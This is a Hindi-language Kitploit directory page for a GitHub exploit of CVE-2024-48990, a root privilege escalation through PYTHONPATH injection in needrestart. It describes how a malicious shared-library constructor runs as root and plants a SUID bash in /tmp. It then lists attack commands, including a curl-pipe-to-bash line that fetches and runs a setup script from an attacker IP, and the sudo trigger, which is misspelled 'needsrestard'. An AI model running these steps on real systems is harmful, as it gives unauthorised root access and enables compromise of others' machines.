Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-48990 — needsrestart setuid रूट शेल के लिए पूर्ण एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/mladicstefan/cve-2024-48990
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubmladicstefan/cve-2024-48990

CVE-2024-48990

needsrestart setuid रूट शेल के लिए पूर्ण एक्सप्लॉइट

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-48990 एक्सप्लॉइट

needrestart < 3.8 में PYTHONPATH इंजेक्शन के माध्यम से स्थानीय विशेषाधिकार वृद्धि।

यह कैसे काम करता है

  1. needrestart रूट के रूप में चलता है और सभी प्रक्रियाओं को स्कैन करता है
  2. हमारी Python प्रक्रिया ढूंढता है, /proc/[pid]/environ से PYTHONPATH=/tmp/.m पढ़ता है
  3. हमारे दुर्भावनापूर्ण PYTHONPATH के साथ Python को रूट के रूप में निष्पादित करता है
  4. Python का import /tmp/.m/importlib/__init__.so लोड करता है (हमारी दुर्भावनापूर्ण लाइब्रेरी)
  5. Python शुरू होने से पहले ही .so में कंस्ट्रक्टर रूट के रूप में निष्पादित होता है
  6. /tmp/rootbash पर SUID bash बनाता है
  7. रूट शेल के लिए /tmp/rootbash -p निष्पादित करें

मुख्य बिंदु: needrestart गैर-विशेषाधिकार प्राप्त प्रक्रियाओं से पर्यावरण चरों पर भरोसा करता है और उन्हें रूट के रूप में इंटरप्रिटर निष्पादित करते समय उपयोग करता है।

उपयोग

हमलावर:

root@kitploit:~
./compile.sh
python3 -m http.server 8000

लक्ष्य:

root@kitploit:~
curl -sf http://10.10.14.109:8000/setup_exploit.sh | bash -s 10.10.14.109 8000
cd /tmp/.m && PYTHONPATH=/tmp/.m python3 e.py

दूसरे टर्मिनल से निम्नलिखित चलाने पर e.py प्रक्रिया हैंग होकर रूट शेल स्पॉन कर देगी:

root@kitploit:~
sudo needsrestard

पहला टर्मिनल रूट शेल शुरू करेगा।

क्रेडिट्स

Qualys थ्रेट रिसर्च यूनिट - CVE-2024-48990

टूल डाउनलोड करें